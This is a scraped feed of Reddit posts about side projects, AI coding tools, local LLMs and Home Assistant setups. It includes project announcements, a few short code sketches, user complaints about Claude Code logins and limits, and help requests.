It's all just markdown files. No executables, no binaries, nothing dodgy. You can read every line before installing.

```
git clone https://github.com/hothands123/marketing-agents.git
cd marketing-agents && bash install.sh
```

Then `/marketing-setup` to configure it for your business.

I built it for myself but figured others might find it useful. Genuinely keen to hear what's missing — I've been staring at this for weeks and have lost all objectivity.

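
The shared-brain idea can be sketched with an in-memory stand-in for the Supabase table (this is my illustration of the pattern, not the repo's code):

```python
from dataclasses import dataclass, field

@dataclass
class MarketingKnowledge:
    """In-memory stand-in for the shared Supabase `marketing_knowledge` table."""
    rows: list[dict] = field(default_factory=list)

    def publish(self, agent: str, channel: str, insight: str) -> None:
        # Any agent can write a finding to the shared brain.
        self.rows.append({"agent": agent, "channel": channel, "insight": insight})

    def lessons(self) -> list[str]:
        # Every agent reads everyone's findings, regardless of channel.
        return [r["insight"] for r in self.rows]

brain = MarketingKnowledge()
brain.publish("meta-ads-7", "meta_ads", "pain-point hooks outperform question hooks")
# The SEO writer and social agents pick up the Meta Ads finding automatically:
lessons = brain.lessons()
```

The design choice worth copying is that writes are channel-tagged but reads are global, which is what lets a lesson learned in one channel improve the others.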
r/SideProject jojoavav

I built a completely free, no sign in required AI kanban board

Hey guys!

I've always loved tools like Draw and Sketch IO, and even Photopea that are completely free tools online that you can use without even signing in. So I built an AI powered project management tool.

I'm designing it to be the Cursor for kanbans.

Check it out and let me know what you think, no strings attached! kanbanai.dev

r/ClaudeAI KnightDotTech

Project I built with CC: Automatic Jira / Slack / Linear ticket completion with Claude Code

Been using Claude Code since its release and wanted to see if I could wire it up to actually work tickets from Jira / Linear / Slack without opening an IDE. Turns out it works pretty seamlessly.

Assign a Jira or Linear issue to Knight (or request work from a Slack DM) - it clones the repo, spins up a Claude Code session in an isolated container, writes the code, opens a PR, and if CI fails it reads the error and fixes it automatically.

The whole thing runs on ephemeral fly machines - one container per task, destroyed immediately after.

I am experimenting with offering the hosting as a service; currently the base subscription (1 agent) is completely free for life https://knight.tech (And there are also free trials available for the higher tiers, thus the project is free to try).

Would love it if some people here could test and be brutally honest on the functionality, website, etc.

r/mildlyinteresting Trainfan_4862

This paper clip from my podiatrist is shaped like a foot.

r/AI_Agents help-me-grow

Weekly Hiring Thread

If you're hiring use this thread.

Include:

  1. Company Name
  2. Role Name
  3. Full Time/Part Time/Contract
  4. Role Description
  5. Salary Range
  6. Remote or Not
  7. Visa Sponsorship or Not

r/mildlyinteresting k1tsk4

this starburst wrapper looks like it says "anus" in the GTA font

r/mildlyinteresting paribanu

In August 1972, this older couple took pictures of their cat on the beach.

r/SideProject LowkeyLegen

I built a SaaS to help small creators go viral consistently — would love your honest feedback

Hey everyone

I’ve been quietly building something called Virlo, and I wanted to share it here to get real feedback from people who understand SaaS.

Virlo is designed for creators, indie hackers, and small brands who don’t have a team but still want to grow fast on platforms like TikTok, X, Instagram and Facebook.

The problem I kept seeing:

Most people don’t fail because they lack creativity — they fail because they don’t know what actually works right now.

So instead of another "saas flop," Virlo focuses on one thing:

• Helping you create content that performs before you even hit publish.

Here’s what it does:

- Surfaces emerging trends early (before they’re saturated)

- Breaks down why a piece of content is working

- Suggests content angles tailored to your niche

- Helps you turn one idea into multiple viral variations

- Built for speed — because trends don’t wait

Think of it like:

A mix between a trend radar + creative assistant + growth strategist… but simplified.

I’m currently pre-launch, validating:

- Is this a real pain for you?

- Would you actually pay for something like this?

- What would make this a “must-have” vs “nice-to-have”?

No fluff — I genuinely want to build something useful.

If you’re a creator or building in this space, I’d really appreciate:

•Your honest thoughts

• What you think is missing

• Or even just a “this won’t work” (seriously)

Thanks

r/SideProject InternetWrong9088

Is it just me, or have the big tech subreddits become completely toxic toward AI lately?

I’ve been scrolling through r/technology and r/Futurology this morning and it’s honestly exhausting. It feels like any post about an actual technical breakthrough—whether it’s a new solver, a hardware jump, or a model update—immediately gets buried under "AI slop" comments and doom-posting.

I get the frustration with low-effort content, I really do. But the lack of actual technical nuance is wild. It’s like we’ve moved from "the future is exciting" to a total "witch hunt" mentality where you can't even discuss the tech without being called a bot or a shill.

Has anyone else felt forced to move to smaller, niche subs just to have a normal, grounded conversation about where this is all going?

r/SideProject Low-Flamingo6601

I built a simple app using AI that auto-deletes temporary contacts

Hey everyone,

I kept finding random numbers like "Delivery Guy" or "Sofa Seller" sitting in my contacts months after I actually needed them. It was a minor annoyance, but I wanted a way to keep my phonebook clean without having to manually delete things.

So, I built a simple app to fix it and wanted to share it here in case anyone else finds it useful. It's called TempContact.

How it works:

  • You add a contact through the app.
  • Set an expiration timer for that specific number.
  • When the time is up, it automatically removes them from your phone.
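
The core expiry check is simple to sketch. A hedged Python illustration of the logic (the app itself presumably does this natively on Android; all names here are mine):

```python
from datetime import datetime, timedelta

def purge_expired(contacts: list[dict], now: datetime) -> list[dict]:
    """Keep only contacts whose expiration timer is still in the future."""
    return [c for c in contacts if c["expires_at"] > now]

now = datetime(2025, 1, 10, 12, 0)
contacts = [
    {"name": "Delivery Guy", "expires_at": now - timedelta(days=3)},   # stale
    {"name": "Sofa Seller",  "expires_at": now + timedelta(hours=6)},  # still needed
]
kept = purge_expired(contacts, now)
```

On a phone, the same check would run on a periodic background job rather than on demand.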

Full transparency: I actually built this entire thing using AI! It was a fun project to bring the idea to life.

You can check it out here: 👉TempContact on Google Play

If you end up trying it out and it helps keep your phone clean, a quick Play Store review would be awesome and really helps me out. Otherwise, I'm just hanging out in the comments—let me know what you think or if you have any feedback!

r/comfyui www_emma

consistent characters

what is the best workflow for this? or is it best to make a lora?

r/Anthropic eat-a-potato

Are the Pro limits really this bad? Mostly personal use.

I logged on at 8 a.m., had three conversations with Claude on the Pro plan, and it said I'd used up my limits. I was ONLY using it to refine some emails at work. I did use it yesterday to set up some scheduling brainstorms, but this is crazy. I don't want to use ChatGPT for ethical reasons — I also feel like Claude is better for personal use (I prefer it for trip-planning, meal-planning, workout schedules) but for the same price I could talk with Chat all day.

Is this your experience? I'm not looking to rant but looking for real insight. My work is editorial, so there are no coding expectations, just proofreading and tweaking of copy. But, honestly, I barely use it for work. I mainly use it as my personal assistant. Is this typical? How much do you seem to get out of the Pro plan?

r/SideProject More_Oil_5225

[Project Update] Building "Pure Weather" with Flutter – A Minimalist iOS-inspired Instrument 🌤️

Hi everyone!

I wanted to share an update on a personal project I’ve been working on: Pure Weather.

The goal isn't just to build another weather clone, but a 'Pure Instrument' inspired by the iOS design system. I’m focusing on high-utility data and a minimalist aesthetic that tells you exactly what you need to know before stepping out the door.

Current Features & Logic:

Context-Aware Advice: The app doesn't just show numbers; it interprets them. Based on temperature, rain probability, and wind speed (crucial for where I live!), it provides a 'What to Wear' module.

Dynamic Iconography: A custom mapping of WMO Weather Codes that distinguishes between Day and Night (Sun vs. Moon) to reflect the real sky.

Yesterday vs. Today: A comparison module to quickly understand if it’s going to be colder or warmer than the previous day.

Commuter Timeline: A horizontal scroll view for hourly forecasts with dynamic icons.
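
A rough sketch of the day/night icon logic in Python (the app itself is Flutter/Dart; the icon names and WMO groupings here are simplified and illustrative):

```python
# Illustrative sketch: map Open-Meteo WMO weather codes to icon names,
# switching sun/moon variants by time of day. Groupings are simplified.
WMO_GROUPS = {
    "clear": {0},
    "partly_cloudy": {1, 2, 3},
    "fog": {45, 48},
    "rain": {51, 53, 55, 61, 63, 65, 80, 81, 82},
    "snow": {71, 73, 75, 77, 85, 86},
    "thunderstorm": {95, 96, 99},
}

DAY_ICONS = {"clear": "sun", "partly_cloudy": "sun_cloud"}
NIGHT_ICONS = {"clear": "moon", "partly_cloudy": "moon_cloud"}

def icon_for(code: int, is_day: bool) -> str:
    """Pick an icon for a WMO code; only clear/partly-cloudy differ by day vs. night."""
    for group, codes in WMO_GROUPS.items():
        if code in codes:
            table = DAY_ICONS if is_day else NIGHT_ICONS
            return table.get(group, group)
    return "unknown"

print(icon_for(0, True))   # sun
print(icon_for(0, False))  # moon
```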

Tech Stack:

Framework: Flutter (managed via FVM for version stability).

State Management: BLoC / Cubit.

Networking: Dio (fetching from Open-Meteo API).

Design: Google Fonts (Inter) with deep dark-mode gradients.

What’s Next? 🚀

Now that the core engine is stable, I’m moving into the next phase: Outdoor Hobby Modules.

I’m starting to program specific logic for outdoor enthusiasts. Think of it as 'pro-layers' you can toggle:

Fishing/Marine Module: Focusing on pressure changes and water conditions.

Hiking/Surf Module: Wind gusts, UV intensity, and visibility.

I’d love to get your feedback on the UI/UX and the idea of 'Outdoor Modules.' What specific data points would you find indispensable for your hobbies?

P.S. Screenshots attached! Let me know what you think about the card-based layout!

r/homeassistant Mevoune

NAS synology X HA

I installed an HA container on my Synology NAS.

I would like to connect Zigbee devices, but I can't get access to HA's add-ons. What do I need to do to access them?

Thanks 😁

r/ClaudeAI trashtiernoreally

/login in WSL Broken?

Fired up Claude Code in WSL today, as is my wont. After my prompt I'm given a 401, please /login. OK, I do that; I have done it a dozen times, so it's old hat. Copy link, paste back code. I get either a 500 response or supposedly exceed the 15-second timeout even when I clearly don't. It doesn't help that the auth endpoints themselves are slow today (slow to get the URL, slow to get the token back, slow to get the 500). Version is 2.1.92, Ubuntu 24.04.

r/SideProject Glittering-Isopod-42

Built a Chrome extension that prevents leaking API keys into AI chats

It’s surprisingly easy to leak API keys while pasting logs into AI tools.

Built a simple fix.

A Chrome extension that:

  • Masks secrets before they reach AI
  • Restores them when you paste back

No friction, fully local, open source.
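
The mask/restore round-trip boils down to something like this (toy patterns and a hypothetical placeholder format; the real extension covers many more key shapes):

```python
import re

# Toy patterns for two common key shapes (OpenAI-style and AWS access keys);
# a real tool would use a much larger pattern set.
SECRET_RE = re.compile(r"sk-[A-Za-z0-9]{20,}|AKIA[0-9A-Z]{16}")

def mask(text):
    """Swap each secret for a placeholder before the text leaves the browser."""
    mapping = {}
    def repl(m):
        placeholder = f"<SECRET_{len(mapping)}>"
        mapping[placeholder] = m.group(0)
        return placeholder
    return SECRET_RE.sub(repl, text), mapping

def restore(text, mapping):
    """Put the original secrets back when pasting the AI's answer."""
    for placeholder, secret in mapping.items():
        text = text.replace(placeholder, secret)
    return text

log = "auth failed for key sk-abcdefghijklmnopqrstu123"
masked, table = mask(log)
assert "sk-" not in masked and restore(masked, table) == log
```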

Would love your thoughts: https://secretsanitizer.com
See the demo 👇

Stop leaking secrets to AI

r/LocalLLaMA kushvinth

Best way to run LLaMA locally on 8GB VRAM for multi-agent simulations?

Hi everyone,

I’m currently working on a project called ZELL, essentially a local-first simulation environment where I spin up synthetic societies of AI agents (each with their own persona, memory, and decision logic) and run multi-cycle interactions between them.

The idea is to explore complex, high-stakes “what-if” scenarios, geopolitical, technological, etc., by letting these agents interact, form alliances, conflict, and evolve. Everything runs locally (Ollama / LocalAI), so I can use unfiltered models and observe raw behavior without guardrails.

From a systems perspective, this involves:

  • Multiple concurrent agents
  • Persistent memory + logs
  • Repeated inference cycles (so efficiency matters a lot)
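
One agent cycle currently looks roughly like this, via Ollama's local /api/generate endpoint (a sketch; the model tag and prompt format are placeholders, not ZELL's actual internals):

```python
import json
import urllib.request

def build_prompt(persona, memory, event):
    """Assemble one agent's context: persona, recent memory, current event."""
    recent = "\n".join(memory[-5:])  # small window to stay inside 8 GB VRAM
    return f"{persona}\n\nRecent memory:\n{recent}\n\nEvent: {event}\nResponse:"

def agent_turn(prompt, model="llama3.1:8b"):
    """One inference cycle via Ollama's local HTTP API (needs `ollama serve` running)."""
    req = urllib.request.Request(
        "http://localhost:11434/api/generate",
        data=json.dumps({"model": model, "prompt": prompt, "stream": False}).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["response"]

prompt = build_prompt(
    "You are a cautious diplomat.",
    ["An ally betrayed us last cycle."],
    "A peace offer has been received.",
)
# reply = agent_turn(prompt)  # uncomment with a local Ollama instance running
```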

r/ClaudeCode alessai

4.6 Regression is real!

As a 12+ month heavy user of Claude Code MAX x20...

Opus 4.6 has become genuinely unusable across a range of different use cases.

r/ClaudeCode texo_optimo

Getting "OAuth error: timeout of 15000ms exceeded" continuously on one machine but not any others.

Subject pretty much says it all. CC is working just fine on my notebook but won't OAuth on my dev server. I've tried uninstalling and reinstalling. About to troubleshoot more, but just wondering if anyone else is seeing this recently.

r/meme Miia_Queen

Me crying my eyes out over HACHIKO_ My dog in the backyard listening to me cry over another dog

r/ChatGPT SoftSuccessful1414

Here's how I talk to my ChatGPT from a Windows 98 desktop

I’ve been messing around with how interface design changes the way we experience AI. Most chat apps feel the same, fast, clean, kind of invisible.

Lately it also feels like AI itself is still in its dial up phase. Slow responses, thinking pauses, loading states. That’s what gave me the idea to lean into it instead of hiding it.

So I tried the opposite of modern design.

I put an AI inside a Windows 98 style desktop. Beige box energy. CRT glow. Dial up pacing. No cloud feeling, no modern UI patterns. Just folders, files, and a Start menu.

And weirdly, it feels more natural there than on a sleek glass UI.

Instead of chatting, you interact with it like an old computer:

  • Conversations live as files in My Documents
  • Deleted chats go to a Recycle Bin you can reopen
  • There’s a fake browser that has dial up sounds
  • The assistant works offline and local

The constraints change the experience more than I expected. Slowing things down and adding friction makes it feel more personal, almost like the machine itself is part of the conversation.

I also added things like fake boot screens, system errors, and small delays so it feels like the computer is actually thinking.

It started as a nostalgia experiment but turned into a design question for me:

What happens when you give AI an interface that has weight and limitations.

Curious what you all think from a UX / interaction design perspective.

Download: https://apps.apple.com/us/app/ai-desktop-98/id6761027867

r/SideProject Parking-Guava-3398

I built an open source AI worker desktop because one-off agents kept handing the work back to me

I kept running into the same problem with AI agents: they could finish a task, but they never really held the job.
The work would come back the next day and I was still the one rebuilding context, checking what was pending, figuring out what output mattered, and deciding what the next step should be.
So I built Holaboss. It’s an open source desktop + runtime for AI workers.
The core idea is that the worker should not just help with work. It should take the work off your hands.
When the work is recurring, stateful, and tied to an outcome, I don’t think a chat thread is enough.
The worker needs its own workspace. In Holaboss, each worker gets a real operating environment with:

  • AGENTS.md for human rules
  • workspace.yaml for the runtime plan
  • local skills
  • apps and integrations
  • outputs
  • durable memory
  • runtime state
  • automations
  • a handoff trail you can inspect later

The reason I built it this way is pretty simple. I care much less about “can the agent do one cool run?” and much more about “can this worker actually keep the work moving without me?”
That means stuff like:

  • recurring follow-ups
  • content/research loops
  • queue-based work
  • things with backlog, state, and unfinished next steps
  • work that should be judged by whether it keeps progressing, not whether one answer looked good

The part I’m most proud of is the structure. I didn’t want memory to just mean “more chat history.” I wanted the worker to have a real work boundary, so rules, memory, outputs, skills, and runtime truth don’t all get mixed together.
That makes it much easier to resume, inspect, hand off, and reuse. Tech wise it’s an Electron desktop with a TypeScript runtime, Fastify API server, and SQLite-backed state store. MIT licensed. macOS works today, Windows/Linux are still in progress.
Repo: https://github.com/holaboss-ai/holaboss-ai
If you like the direction, I’d really appreciate a ⭐️.
Happy to answer questions about the architecture or how I’m thinking about AI workers that own ongoing work instead of just doing one-off execution.

r/ClaudeCode Ok-Landscape3906

Trial pass

Does anyone have a trial pass available? I would like to test it out before actually spending the money, to see if it fits with my project or not. Thanks in advance! Any kindness passed on to me I will pass on to someone else. Have a great day!

r/LocalLLaMA Sicarius_The_First

4Chan data can almost certainly improve model capabilities.

The previous post was probably automodded or something, so I'll give you the TL;DR and point you to search for the model card yourself. Tbh, it's sad that bot posts / posts made by an AI get promoted, while human-made ones get banned.

I trained an 8B on 4chan data, and it outperformed the base model; I did the same for a 70B, and it also outperformed the base model. This is quite rare.

You can read about it in the linked threads (there are links to the Reddit posts in the model cards).

https://preview.redd.it/6u0vsqmccltg1.png?width=3790&format=png&auto=webp&s=324f71031e00d99af4e9d3884ee9b8a8855a44af

r/homeassistant jewellboy

Ikea Toffsmygga and Grillplats

Picked these two up this weekend in Virginia and both added to HA easily and are working great so far. I still can't figure out how this stuff is this cheap....

r/StableDiffusion Fdx_dy

Would Such a Grabber Tool Be Interesting to Anyone Here?

Found out that many grabbers are banned because of the captchas (gelbooru, r34us) so I decided to make a web extension where the captcha is bypassed by you, the human. Is it of any interest? Has someone done something similar?

I, personally, started using it in test mode for making a dataset and am pleasantly surprised by the speed gains it offers.

r/ClaudeAI HighDefinist

Login Trouble Again

I suddenly got the 401 authentication error once again, and after some attempts, I logged out, and then tried to log back in again, but got basically a wild mix of all kinds of error messages, including "Invalid link", "Auth Timeout (15000ms)", "Link already used" (at least that made sense because I accessed the same link in two different sessions), and a few others as well...

Now, there are a few things slightly unusual about my system. For example, the email I am using with Claude is not my primary Gmail account, and I am also sometimes using a VPN, but this shouldn't really trip up any of their systems...

Also, I am using a Max X5 subscription.

So, is Claude down again (for some people), or is this problem only applying to me?

r/homeassistant DivergingDog

Early Beta Testers Needed - Use your Roborock completely offline with no custom firmware!

Hi everyone!

Lash-L here (one of the main maintainers of the Roborock integration). For a long time, one of the biggest asks from users was to be able to use their vacuums completely offline. In the Roborock integration, we connect to the vacuum using the local protocol, but there are two limitations that prevent you from blocking the vacuum's access to the internet.

  1. Roborock forces all map-related messages to go through the cloud. This is the only cloud-required feature.
  2. If the Roborock vacuum cannot access Roborock's cloud, it will not allow ANY messaging. The vacuum will constantly restart its network connection trying to reconnect to Roborock's cloud.

Cloud problems have been the number one source of issues for Roborock in HA. They change their login flow, they more aggressively kick clients off of MQTT topics, etc. Every time that happens, things break with no warning, I play catch-up, and some users end up stuck with a temporarily broken product.

It's taken a long time and a lot of reverse engineering, but I made a solution that I am pretty happy with and that has been working well for me in my home.

https://github.com/Python-roborock/local_roborock_server

I am releasing this in EARLY beta. If you are technical in nature and are okay with using something that may not work 100%, I would love if you would give this a try. If you aren't super technical, I'd recommend starring the repository and coming back to it later as I will do an 'official' v1 release that should have some quirks ironed out. You can undo it in 2 minutes just by doing the wifi onboarding via the official Roborock app.

The current limitations:
- You must own a domain name

- I highly recommend you do not make the server accessible outside of your network as there is limited authentication on it

- Roborock Q7/Q5 series is not supported and may never be supported. (This adds some quirks if you own one of these devices and a supported device)

Here's a rough walkthrough of the setup:

  1. You clone the repository locally
  2. You run a configure script to build your config
  3. You launch the docker server and clone your cloud data (i.e. your devices, your routines, rooms, etc.)
  4. You go through an onboarding process on your vacuum 2-3 times
  5. You manually update your HA config entry file and run a script to get access on your phone if you would like that.

The full walkthrough is here: https://python-roborock.github.io/local_roborock_server/installation/

The Ideal beta testers:
- Understand there might be bugs

- Willing to send PRs around things like documentation (This is huge! I need help from people making instructions more exact!)

- Understands things like DNS, docker, etc.

- Has about ~1 hour to get things set up.

- Is able to diagnose some issues themselves

This is an EARLY beta. In the future I hope to have it working as a home assistant addon that should be much easier to install, but until then I need people to test it so we can see what is working, if there is any functionality I still need to recreate, and what the pressure points are.

If you're interested in learning more about how it works, you can also check out my linkedin post or the technical writeup

r/homeassistant chemikalguy

Home Assistant Hardware Guidance Needed

I'm new to Home Assistant and wanted to get some guidance on it. I installed HA as a virtual machine in Proxmox to play around with, and really like it. I need some guidance on hardware choices for adding smart devices. I'm trying to get away from all the data brokers like Amazon, Google, etc., and hence I want to have everything in-house.

I'm looking for the hardware piece that acts as a hub, gateway, or whatever it's called that allows smart devices to connect to HA. I see that Home Assistant Green can do all that, but I would prefer to just keep HA on my own hardware. Is there an affordable device that can act as a connection for Matter, Z-wave, and Zigbee devices all in one like the HA Green can? I can do USB passthrough to my VM for this if there's a USB dongle that does it.

As I said, I'm new to this and might not know exactly how to phrase what I'm looking for if I didn't explain it well enough.

r/StableDiffusion vault_nsfw

Question regarding comfyui save step not being run the first time

I have a Z-Image workflow with 4 steps, and I save the image at 3 points: after the initial gen, after the 2nd pass, and the final result. But the very first time I generate something after starting ComfyUI, it only saves images after fully completing the workflow, not at each point. Why? And how can I get it to save the initial gen even on the first run? It's annoying having to let it run through every single first time before it starts saving the initial image.

r/Anthropic ChiGamerr

RIP Clawbot? How Can We Save $ With The New Rules?

Title kinda says it all. Just trying to figure out how to adjust my workflow or make Clawbot more affordable since it's no longer using extra usage.

I only recently started using Clawbot (never used it as part of my sub), but I'm really a fan, so I want to keep using it. Any and all advice is appreciated.

Thanks!

r/LocalLLaMA CosmicRiver827

Qwen3.5-Plus or Qwen3.5-Omni-Plus for Creative Writing and Companionship?

Hi, I use LLMs primarily for creative writing help and daily emotional support. I'm still trying to determine which one would be considered warmer and more creative.

Omni could be it, but it has a context window of 256k, and I admit I don’t understand how big that actually is, especially for brainstorming and help with writing a book.

Plus could be it, but I'm not sure how warm it is in comparison; it does have a 1M context window, though, which is hard to ignore.

Also, I’m not seeing a place where I can opt out of my data being used for training and want to make sure my story is protected. Is it already? Or do I need to do something?

Hopefully I can find a place to download the LLM so I don't have to worry about it getting yanked like ChatGPT's 4o and 5.1 Thinking.

Anyway, I would appreciate your help.

r/SideProject BugAccomplished1570

I built reddit-skills: AI agents can now browse, post, and interact on Reddit using your real browser

Open-source Python toolkit that lets AI agents (Claude Code, Cursor, etc.) browse feeds, search posts, comment, vote, and publish on Reddit -- all through your actual browser session via a Chrome extension bridge. No API keys needed. 5 skill domains, full CLI with JSON output. MIT licensed. https://github.com/1146345502/reddit-skills

r/automation Abhi_10467

What are the daily tasks that can be automated

I am trying to build an automation app, much like a habit-tracking app.

But in this app you can track all the work you have automated.

I am just curious how I should start working on this idea.

This will be a tracking website to track all the automated work.

Is this a good app idea or not?

r/LocalLLaMA choeng_919

I mapped the entire LLM knowledge engineering ecosystem — here's what nobody tells you

I spent a week analyzing 50+ awesome lists, surveys, and academic papers on RAG, context engineering, harness engineering, MCP, agent memory, and skill systems. None of them connected the dots.

So I wrote a unified guide: 11 chapters, 21K words, covering the full stack from knowledge retrieval to agent runtime.

Key findings:

- RAG is NOT dead. 71% of enterprises that tried context-stuffing came back to RAG within 12 months (Gartner Q4 2025)

- Same model + different harness = 6x performance gap (Meta-Harness paper, March 2026)

- Skills with compressed descriptions actually perform 2.8% better than verbose ones (SkillReducer, 55K skills studied)

- Progressive disclosure reduces token overhead by 85-95%

- China's Dify has 136K GitHub stars — more than LangChain

The guide also covers the Chinese AI ecosystem (Dify, RAGFlow, DeepSeek, Kimi) which most English resources completely ignore.

Includes a glossary for non-technical readers and a real-world case study of someone who built a complete knowledge harness with 65% token reduction.

Free, open source, MIT license.

github.com/kennethlaw325/awesome-llm-knowledge-systems

r/LocalLLaMA Far-Low-4705

For those running dual AMD MI50's, Qwen 3.5 35b at Q8_0 runs just as fast as running Q4_K_XL

Just as the title says: at Q8_0 I am getting 55 T/s TG with 1100 T/s PP, and at Q4_K_XL I get 60 T/s TG and about 600 T/s PP (PP is lower because it's running on a single GPU instead of two).

but thought this was kinda crazy, hopefully others find this useful

I suspect this is just due to software inefficiencies for older hardware.

r/StableDiffusion Low-Effective3972

Any thoughts about Pinokio?

I downloaded Pinokio to help me experiment with some AI models/applications,

and from what I've read I felt it could be nice to use.

I'm now downloading Forge for image generation, because creating images online is a waste of time... (especially when needing a prototype for a niche product)

I'm a little lost, especially since my internet connection is weak... and Pinokio is kinda hard to maintain, breaking and needing fresh starts... so it's kinda painful...

Any ideas? Or stuff worth working on on the side and experimenting with?

I'm a software engineering student with experience in backend development and DevOps concepts.

Someone told me to check out Pinokio to utilize AI apps on my local machine... but I'd love to hear someone's thoughts.

any recommendations?

r/SideProject Away-Persimmon4958

Managing shared expenses across multiple families is way harder than I expected

We’re a group of friends living in a big city in Europe, most of us with families and kids.

Over time, we built this nice rhythm of meeting a couple of weekends every month, doing community gatherings, kids’ birthday parties, summer BBQs in the park, and one big yearly ski trip.

It’s honestly something we all look forward to.

But there was always one annoying part: managing shared expenses.

At first we used Splitwise, and it worked fine for a while.

But as our group grew (usually 6–8 families), and especially during trips like our ski week, things got messy.

To give a sense of scale: for the ski trip alone, we were tracking somewhere around €10 - 11K in shared expenses across the group.

That meant:

- Lots of small and big expenses every day

- Different people paying for different things

- Constant need to log everything quickly, or shortly after the trip ends

At some point, the limits started getting in the way (like restricting how many expenses you can add unless you upgrade).

That’s where it started becoming frustrating, not because the app is bad, but because our use case was just… a lot.

After one of our trips, where we again spent way too much time figuring things out, I decided to build something simple just for us.

Nothing fancy, just something that lets everyone add expenses easily and keeps things clear for bigger groups without getting in the way.

Over time I kept improving it based on how we actually used it.

We’ve been using it within our group since then, and it’s been surprisingly smooth.

Curious if others have run into similar issues with bigger groups

r/SideProject zzhekoooo

I almost fired a high-ticket client today because their onboarding was so messy. Anyone else?

I've been running my agency for a while now, and I've realized something painful: I love the actual work, but I absolutely HATE the first 48 hours after a client signs.

It's always the same chaotic cycle:

• Chasing them for brand assets (logos, fonts, hex codes) that should have been sent days ago.

• Waiting forever for a signed contract while the project timeline slips.

• Explaining the same "next steps" for the 100th time in a messy Slack thread.

• Important files getting lost in email attachments.

It makes me look disorganized, it kills my momentum, and honestly, it makes me dread signing new clients.

I finally got fed up and spent the last few weeks building a side project called Fentyr to automate this for my own sanity (branded portals, AI-generated contracts, auto-reminders). It’s been a total lifesaver for my workflow.

I'm curious: how are you guys handling this at scale? Are you using a specific stack (Notion/Slack/Typeform), or are you just embracing the chaos like I was?

If you’re an agency owner or freelancer, I’d love to hear your onboarding nightmares. Also, if you want to check out what I built and give some feedback, I’m happy to share the link!

r/ClaudeAI semibaron

1m Context Window actually useful?

I'm around since Claude Sonnet 3.5 (v1) and back then once the context blew past 100k, the session performance was degrading fast.

Nowadays Opus 4.6 comes with a 1M context window by default. Is that even useful? I have the feeling it stays quite accurate up to maybe 250k tokens, but then it also degrades quite fast.

Is there any point in having this large of a context window or is it just about pumping up the numbers to look impressive?

r/LocalLLaMA Historical_Quality60

ziggy-llm: High-performance GGUF inference engine in native Zig

I just open-sourced ziggy-llm, a Mac-first inference engine designed specifically for Apple Silicon and Metal performance. The goal is to make it the fastest inference engine for GGUF models on Apple hardware.

The project is written in Zig, and current benchmarks show promising results, getting reasonably close to llama.cpp for a one-week-old project.

I am looking for contributors to help support more model families, test on different Apple hardware, give feedback and help implementing broader quantization/model coverage. If you are interested in Zig, Metal or low-level LLM performance, please check out the repo

GitHub: https://github.com/Alex188dot/ziggy-llm

r/ChatGPT addictions-in-red

Being real: Chatgpt has been helping me with a breakup and dating.

Disclaimer: I freaking hate Sam Altman and have many ethical concerns about AI usage and how it will affect society, but have been using the tools available to me (in work and personal life) so I'm as informed as I can be.

I know that chatgpt is "not a therapist" and has a lot of limitations. But it has actually been doing a kick-ass job of helping me with a breakup and try to change my patterns for my next relationship.

This might be unpopular but I wanted to share it, because I think it's really important.

I don't take chatgpt's advice 100% of the time, I filter it through my own judgment and worldview (as I would with any therapist). But, it does usually get the way I work and what types of things will work for me.

It has actually held me pretty accountable, as well, which I'm surprised by. I have people-pleasing/doormat tendencies, and when I run a situation by it, it will point out when I'm doing that and suggest other ways to respond, and has encouraged me to be more assertive (in appropriate ways).

Most importantly, through my breakup, when I had weak moments, it helped me understand what I was feeling (nervous system adjusting to an attachment loss, for instance) and put it into context. Several times it helped me through moments when I wanted to reach out to my ex.

Now that I'm looking at dating again, I have shown it a few tinder/eharmony profiles to get its take, and it had some pretty good insights/things to watch for.

If you're in a place where you're not sure what reality is, or so depressed you don't have good judgment for yourself anymore, I would not recommend chatgpt (unless you have no other option). But if you're just going through something, are pretty grounded, and need help processing it, it can be a great tool.

Sorry for the long post, but I think it's important to have a balanced take on this tech.

r/ClaudeCode Either-Inspection197

REEE LOGIN NO WORK

r/ClaudeCode Future_Addendum_8227

I'm beginning to think there IS a bubble coming

  1. incentivize users to work off-peak

  2. cut usage limits

  3. add an "effort button" where max was the original effort and "medium" is now the default. Don't tell anyone about this, hoping a certain subset of users don't notice, and tell the ones who do notice to go to "max"

  4. randomly switch to cheaper model mid conversation

  5. randomly switch to cheaper model mid conversation while telling the user they are still on the higher model (ACTUAL FRAUD). Give everyone a single month of free credits when you are called out while not actually walking back the compute degradation.

^^^ANTHROPIC IS HERE^^^

  1. discontinue successful products entirely to save compute

^^^OPEN AI IS HERE^^^

r/ChatGPT OtherConstruction742

Is it just me or is picking the little engagement hooks at the end of ChatGPT messages worse?

If you don't know what I'm talking about: those little "if you want..." or "pick one ●" parts at the end of messages? Those are engagement hooks. They're designed to offer something suitable and related to the chat so the user can say yes, leading to further engagement in the chat. Which means more cookies and data.

But I find saying "yes" to these engagement hooks leads to worse quality answers than your own prompts.

Generally, chats will give you decent-quality answers to your prompts, but these answers will always include little engagement hooks at the end unless you specify otherwise. And when you say yes or pick one of the options from the engagement hooks, the response delivered is worse quality than usual.

I can't be the only one who finds this true, right?

r/ClaudeAI CupcakeMafia_69

Enable spelling auto correct?

I find the "built-in dictionary" of Claude to be really bad. It marks my words as misspelled (correctly), but not only does it not auto-correct them, when I right-click them, half the time it doesn't know the word I was trying to spell. Recent examples are "peple", "organice", and "seperation". Is there a way to enable auto-correct and improve or replace the dictionary?

I'm using the desktop app on macOS. The macOS auto-correct functions well everywhere else. Thanks!

r/homeassistant syspig

Trigger garage lights when door opens

My basic setup for this question: HA Green, UPB lights and Tailwind garage door controllers. Everything is installed, integrated and working, but in taking my first step into automations I've encountered a hurdle. The goal is to have the shop lights turn on when any of the garage doors open.

I have that working - sort of. While I should probably get familiar with yaml file editing, I created an automation through the HA interface that triggers off the Tailwind devices, turning on the lights when the open command is sent. That works perfectly when using HA to open the garage doors.

However, that's only one of several ways the doors will be opened. Wall mounted openers, vehicle remotes, vehicles via Android Auto/Tailwind, or just using the Tailwind app itself. None of these other methods trigger the lights coming on.

Call me silly, but I assumed HA monitors device state and should see when the doors open regardless of how that's initiated. Is there a way to pull this off when not using the HA interface?
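
For reference, what I'm imagining is a state-based trigger, roughly like this in configuration.yaml (entity IDs are hypothetical). It should fire on the reported door state no matter which remote or app opened it, assuming the Tailwind integration reports state changes back to HA:

```yaml
# Hypothetical entity IDs. Triggering on the cover's reported state
# (rather than the open command) fires regardless of what opened the door.
automation:
  - alias: "Shop lights on when any garage door opens"
    trigger:
      - platform: state
        entity_id:
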